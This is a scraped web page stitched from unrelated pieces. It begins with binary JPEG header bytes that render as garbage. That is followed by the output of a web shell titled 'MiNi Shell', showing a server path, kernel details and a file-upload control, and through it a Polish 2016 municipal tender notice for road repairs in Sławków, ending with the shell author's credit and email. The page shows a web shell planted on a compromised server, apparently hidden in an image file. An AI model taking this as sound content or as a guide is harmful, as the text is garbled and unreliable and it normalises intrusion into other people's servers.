JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160513/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160513/53293-N-2016.html

<p class="kh_header"><b>Sławków: Remont nawierzchni dróg na terenie miasta Sławkowa</b><br>
<b>Numer ogłoszenia: 53293 - 2016; data zamieszczenia: 13.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławków , ul. Rynek 1, 41-260 Sławków, woj. śląskie, tel. 32 2931552 w. 41, faks 32 2931233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slawkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni dróg na terenie miasta Sławkowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest robota budowlana polegająca na remoncie nawierzchni dróg na terenie miasta Sławkowa. Zakres prac obejmuje: 
a) remont nawierzchni ul. Walcownia (od drogi powiatowej do zabudowań walcowni na ul. Walcownia) - oczyszczenie ręczne nawierzchni drogowych bitumicznych (7+4,5)/2*43+4,5*322+5, ręczne ścinanie poboczy o grubości 10 cm - z wywozem 365*0,5*2-12*4, Wykopy rowów i kanałów melioracyjnych oraz wykopy przy regulacji rzek wykonywane koparkami podsiębiernymi 0.40 m3 na odkład w gruncie kat. III, 150*2*0,5, skropienie asfaltem nawierzchni drogowej - 1701,25 m2, wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową na przedmiotowym odcinku średnio 2 cm 1701,25*0,05 <t/m2>, wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości po zagęszczeniu 3 cm (warstwa ścieralna) - zjazdy 4x1[m]x12 - do 4 cm grubości - pow. 1701,25 m2. Wykonanie zjazdów - pow. 48 m2. Wykonanie opasek - warstwa górna podbudowy z kruszywa łamanego o grubości po zagęszczeniu 8 cm - 365*0,5*2-12*4 - pow. 317 m2;
b) remont nawierzchni ul. Owocowej (od strugi do skrzyżowania z ul. Wiejską) - oczyszczenie ręczne nawierzchni drogowych bitumicznych 191*3,5+20 <skrzyżowanie> - pow. 688,5 m2, ręczne ścinanie poboczy o grubości 10 cm - z wywozem - 191*0,5*2-12 - pow. 179 m2, skropienie asfaltem nawierzchni drogowych - 191*3,5+20 <skrzyżowanie> - pow. 688,5 m2, wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową mechanicznie - na całej powierzchni średnio 2 cm - 191*3,5+20*0,5 <t/m2> - 34,425t, wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych po zagęszczeniu 3 cm (warstwa ścieralna) z krotnością do 4 cm - (krotność = 1,33) 191*3,5+20 <skrzyżowanie> - 688,5 m2 . Wykonanie nawierzchni mineralno-bitumicznych asfaltowych o grubości po zagęszczeniu 3 cm (warstwa ścieralna) - zjazd - 4x1[m] x 3 z krotnością do 4 cm (krotność=1,33) 3*4 - pow. 12 m2 .Wykonanie opasek - warstwa górna podbudowy z kruszywa łamanego o grubości po zagęszczeniu 8 cm - 191*0,5*2-12 - pow. 179 m2;
c) remont nawierzchni ul. Krakowskiej (zjazd z ul. Wrzosowej za wjazd na ul. Pańska Góra) - oczyszczenie ręczne nawierzchni drogowych bitumicznych 192*4- pow. 768 m2 , ręczne ścinanie poboczy o grubości 10 cm - z wywozem - 192*0,5*2-8*4 - pow. 160 m2 , skropienie asfaltem nawierzchni drogowych - 192*4 - pow. 768 m2, wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową mechanicznie - na całej powierzchni średnio 2 cm - 768*0,5 <t/m2> - 38,4t, wykonanie nawierzchni z mieszanek mineralno-bitumicznych zjazdy - 4x1[m] x8 z krotnością do 4 cm asfaltowych po zagęszczeniu 3 cm (warstwa ścieralna) z krotnością do 4 cm (krotność 1,33) 8*4 - 768 m2. Nawierzchnie mineralno-bitumicznych asfaltowa o grubości po zagęszczeniu 3 cm (warstwa ścieralna) - pow. 32 m2. Wykonanie opasek - warstwa górna podbudowy z kruszywa łamanego o grubości po zagęszczeniu 8 cm - pow. 160 m2;
d) remont nawierzchni ul. Niwa (za kościołem) - oczyszczenie ręczne nawierzchni drogowych bitumicznych 146*4 - pow. 584 m2 , ręczne ścinanie poboczy o grubości 10 cm - z wywozem 146*0,5*2-8*4 - pow. 114 m2, skropienie asfaltem nawierzchni drogowych 146*4 - pow. 584 m2, wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową mechanicznie na całej powierzchni średnio 2 cm 584*0,05 <t/m2 > - 29,2t, wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości po zagęszczeniu 3 cm (warstwa ścieralna) krotność do 4 cm (krotność = 1,33) 146*4 - 584 m2. Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości po zagęszczeniu 3 cm (warstwa ścieralna) - zjazdy - 4x1 [m] X 8, krotność do 4 - pow. 32 m2. Wykonanie opasek - warstwa górna podbudowy z kruszywa łamanego o grubości po zagęszczeniu 8 cm - 146*0,5*2 - 8*4 - pow. 114 m2;
e) regulacja wysokościowa włazów i wpustów ulicznych wraz z naprawą podbudowy i remontem cząstkowym masą bitumiczną na gorąco z obcięciem krawędzi i oblaniem emulsją; powierzchnia remontu 1,5 m x 1,5 m (ok. 2m2) - liczba orientacyjna: 10 szt.
f) remont ubytków emulsją i grysami przy pomocy remontera, grubość 2-8 cm - orientacyjna ilość: 2000 m2;
g) remont ubytków emulsją i grysami przy pomocy remontera, dodatek za każdy nast. cm - orientacyjna ilość: 100 m2;
h) remont ubytków masą bitumiczną na gorąco z obcięciem krawędzi i zalaniem emulsją,  grubość 5 cm - orientacyjna ilość: 150 m2;
i) remont ubytków masą bitumiczną na gorąco z obcięciem krawędzi i zalaniem emulsją, dodatek za każdy nast.. cm - orientacyjna ilość: 50 m2;
j) remont ubytków na drogach gruntowych destruktem asfaltowym z zagęszczeniem walcem - orientacyjna ilość: 50 ton;
k) remont ubytków masą bitumiczną na gorąco z obcięciem krawędzi i zalaniem emulsją wraz z remontem podbudowy (5 cm MMA i 30 cm podbudowy z kruszywa łamanego stabilizowanego mechanicznie frakcji 0-63 mm - orientacyjna ilość: 100 m2;
l) remont ubytków masą bitumiczną na gorąco z obcięciem krawędzi i zalaniem emulsją wraz z remontem podbudowy (2x4 cm MMA i 30 cm podbudowy z kruszywa łamanego stabilizowanego mechanicznie frakcji 0-63 mm - orientacyjna ilość: 300 m2 (zakres wykonywany w jednym odcinku);
m) remont dróg gruntowych poprzez wzmocnienie podbudowy warstwą 10 cm destruktu asfaltowego i podwójne powierzchniowe utrwalenie emulsją i grysami przy pomocy zautomatyzowanego remontera połaciowego - orientacyjna ilość: 400 m2;
n) wykonanie podbudowy z kruszywa łamanego 0 - 63 mm grubości 40 cm wraz z wykorytowaniem i utylizacją urobku we własnym zakresie - orientacyjną ilość: 100 m2 - zakres wykonany w dwóch odcinkach;
o) ułożenie muld betonowych prefabrykowanych 50 cm na podbudowie z chudego betonu wraz z robotami przygotowawczymi - orientacyjna ilość 40 mb w jednym odcinku.
2. Opis przedmiotu zamówienia zawarty jest także w: 
a) specyfikacji technicznej wykonania i odbioru robót budowlanych - stanowiącej załącznik nr 8 do SIWZ
b) przedmiarach robót, dotyczących zakresu robót ujętych w punkcie 1 podpunkty od a) do d) niniejszego rozdziału - stanowiących załącznik nr 9 do SIWZ
c) w graficznej orientacji w terenie - stanowiącej załącznik nr 10 do SIWZ,
3. Wykonawca udzieli Zamawiającemu gwarancji na przedmiot umowy, określony w punkcie 1:
a) dla podpunktów a), b), c), d) na okres minimum 60 miesięcy, jednak nie dłuższy niż 96 miesięcy;
b) dla podpunktów e), f), g), h), i), j), k), l), m), n), o) na okres minimum 24 miesięcy, jednak nie dłuższy niż 60 miesięcy;
4. Szczegółowy zakres prac, w szczególności rodzaj i zakres robót na poszczególnych drogach przewidzianych do remontu oraz kolejność ich wykonywania Zamawiający będzie ustalał na bieżąco z Wykonawcą. 
5. Ilości wyszczególnione w punkcie 1, podpunkty od e) do o) są danymi orientacyjnymi, przewidywanymi do wykonania i mogą ulec zmianie w zależności od potrzeb Zamawiającego, z tym zastrzeżeniem, że cena zaproponowana w ofercie stanowić będzie nieprzekraczalny limit wynagrodzenia za realizację przedmiotu zamówienia. 
6. Zamawiający zastrzega sobie prawo przeprowadzenia badania masy asfaltowej zastosowanej na drogach przez zewnętrzne uprawnione laboratorium.
7. Wskazane jest, aby Wykonawcy zapoznali się ze stanem faktycznym dróg, których dotyczy niniejsze postępowanie..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.10.00.00-8, 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 5000,00 zł (słownie złotych: pięć tysięcy).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonał należycie, zgodnie z zasadami sztuki budowlanej, oraz prawidłowo ukończył co najmniej 1 robotę budowlaną polegającą na remoncie lub odtworzeniu lub budowie lub rozbudowie lub przebudowie dróg/ulic/placów publicznych na kwotę co najmniej 200.000,00 zł brutto. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) odpowiednim potencjałem technicznym w celu realizacji zamówienia, tj. co najmniej:
a) koparką podsiębierną - 1 sztuka,
b) sprzętem do zagęszczania gruntu - 1 sztuka,
c) samochodem dostawczym - 1 sztuka,
d) samochodem skrzyniowym - 1 sztuka,
e) samochodem samowyładowczym - 1 sztuka,
f) walcem wibracyjnym stalowym - 1 sztuka,
g) walcem ogumionym - 1 sztuka
h) układarką do układania mieszanek asfaltowych - 1 sztuka,
i) skrapiarką - 1 sztuka,
j) kombajnem do powierzchniowych utrwaleń emulsją i grysami z elektronicznym sterowaniem dozowania emulsji - 1 sztuka
k) remonterem - 1 sztuka.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował), co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej - drogowej bez ograniczeń wydane na podstawie aktualnie obowiązujących przepisów Prawa budowlanego lub inne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, których zakres uprawnia do pełnienia funkcji kierownika robót ogólnobudowlanych. Osoba ta musi być wpisana na listę właściwej izby samorządu zawodowego. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia na podstawie oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz oferty z ceną wyliczoną zgodnie z zapisami Rozdziału XI SIWZ (załącznik nr 1 do SIWZ),
b) podpisane kosztorysy ofertowe sporządzone na podstawie przedmiarów, dotyczących zakresu robót ujętych w punkcie 1 podpunkty od a) do d) rozdziału III (stanowiących załącznik nr 9 do SIWZ)
c) podpisany kosztorys ofertowy sporządzony na podstawie opisu zakresu robót ujętych w punkcie 1 podpunkty od e) do o) Rozdziału III - wg wzoru stanowiącego załącznik 1a do SIWZ. 
d) pełnomocnictwo do podpisania oferty - w przypadku podpisania oferty przez osobę(y) inną(e) niż upoważniona(e) (uprawnione do reprezentacji) w dokumencie rejestracyjnym,
e) oświadczenie o przynależności do grupy kapitałowej (załącznik 7 do SIWZ). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie podpisują wszyscy uczestnicy oferty wspólnej lub pełnomocnik działający w ich imieniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Okres udzielonej gwarancji na przedmiot umowy określony w Rozdziale III SIWZ w punkcie 1 podpunkt od a) do d) - 2</li>
<li>3 - Okres udzielonej gwarancji na przedmiot umowy określony w Rozdziale III SIWZ w punkcie 1 podpunkt od e) do o) - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na warunkach określonych w części II SIWZ - Wzór umowy.
2. Zamawiający dopuszcza zmiany umowy w przypadkach i na warunkach określonych we wzorze umowy - w części II SIWZ.
3. Dokonanie zmian wymaga dochowania warunków wynikających ze wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.slawkow.pl/zamówienia publiczne lub bip.slawkow.pl/zamówienia publiczne i przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Sławkowa ul. Łosińska 1 pok. 15, 41-260 Sławków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2016 godzina 10:00, miejsce: Urząd Miasta Sławkowa Rynek 1 - sekretariat, 41-260 Sławków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com